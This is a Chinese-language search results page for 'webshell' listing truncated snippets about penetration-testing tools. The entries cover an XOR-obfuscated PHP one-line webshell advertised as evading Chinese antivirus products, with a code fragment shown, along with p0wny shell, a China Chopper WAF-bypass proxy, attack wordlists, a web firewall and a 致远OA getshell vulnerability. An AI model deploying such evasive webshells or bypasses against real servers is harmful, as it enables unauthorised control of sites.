搜索 “webshell”

ArbitraryPHP - 任意PHP代码执行扩展 这是一个实验性的PHP扩展，加载这个扩展后，每次请求将可以执行一段自己的PHP代码。 可用于： 管理目标PHP站点（webshell）HOOK与分析HTTP执行流程在不修改源代码的情况下控制PHP执行结果 安装 选择对应版本的PHP，下载Releases下的二进制文件安装包，解压并获得相应PHP版本的二进制文件...

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; $gba = 'H' ^ "\x3a"; $oya = 'Y' ^ "\x2d"; $MWUC = $rlf . $fzq . $fgu . $sbe . $gba . ...

p0wny @hell：单文件PHP Shell p0wny @hell 是一个非常基本的单文件PHP shell。当测试PHP应用程序时，它可用于在服务器上快速执行命令。请谨慎使用：此脚本表示服务器存在安全风险，它是类似于webshell的脚本。 PHP shell命令执行脚本 地址：https://github.com/flozz/p0wny-shell 功能特征 命令历史记录（使用箭头键↑ ...

CaidaoMitmProxy 基于HTTP代理中转中国菜刀过WAF,基于菜刀20160622版本修改和测试。理论上是支持低版本菜刀。本人没测试希望大家来帮忙测试下。 安装 pip[3] install pydespip[3] install mitmproxy 使用 替换 caidao.conf 文件(使用 PHP DES 加密脚本的时候才需要替换)将支持 DES 加密的 Webshell 上传到服务器的 Web目录运...

SaiDict 渗透测试字典 该项目维护者收藏了弱口令，敏感目录，敏感文件等渗透测试常用攻击字典。用于项目的安全审计与安全检测。 渗透测试字典项目 目前字典的目录大概分布如下： 账户字典 |-常用弱密码 |-常用账户名 |-中国人名拼音 |-常用手机号 fuzz字典 |-LDAP注入 |-SQ...

SecLists介绍 SecLists是安全测试人员的伴侣工具箱，渗透测试工具资源收集。它是在安全评估期间使用的多类型渗透测试资源的集合。类型包括用户名，密码字典，URL，敏感数据，模糊测试payloads，Webshell，XSS等等。目标是使安全测试人员能够将此存储库拉到新的测试工作中，并可随时访问需要的类型列表。 SecLists下载 压缩方式...

收藏整理的渗透测试字典 字典内容已经去重 Port 出现频率较高的端口号，平时我是使用Telnet来扫描端口，就没有每个端口号进行换行。 User 主要是一些从网络上收集的用户密码字典。 /IDC_password/         # IDC 爆破密码/User_name/            # 用户名/User_pa...

ngx_lua_waf web应用防火墙 ngx_lua_waf是一个基于OpenResty（Nginx+Lua）的web应用防火墙。而ngx_lua是一种可以把lua语言嵌入nginx中，使其支持lua来快速开发基于nginx下的业务逻辑的技术。 实现功能 防止sql注入，本地包含，部分溢出，fuzzing测试，xss,SSRF等web攻击防止svn/备份之类文件泄漏防止ApacheBench之类压力测试工...

致远OA getshell 2019年6月26日，网络中出现致远OA的0day漏洞信息。该漏洞可造成任意文件上传，恶意攻击者通过精心构造POST数据来上传JSP Webshell，提升服务器权限，从而控制服务器或对系统造成破坏。 漏洞等级 高 影响版本 致远A8-V5协同管理软件 V6.1sp1致远A8+协同管理软件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3致远A8+协同...

这是一个提供渗透测试辅助工具(pentest-tool)、资源文件的一个项目。 辅助工具 提供轻量级的易扩展的工具，可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等；包含以下功能： Exploit系统。易扩展的exploit系统，能够使用API快速编写exploit，能够批量执行exploit子域名爆破。爆破子域名，使用域传送、D...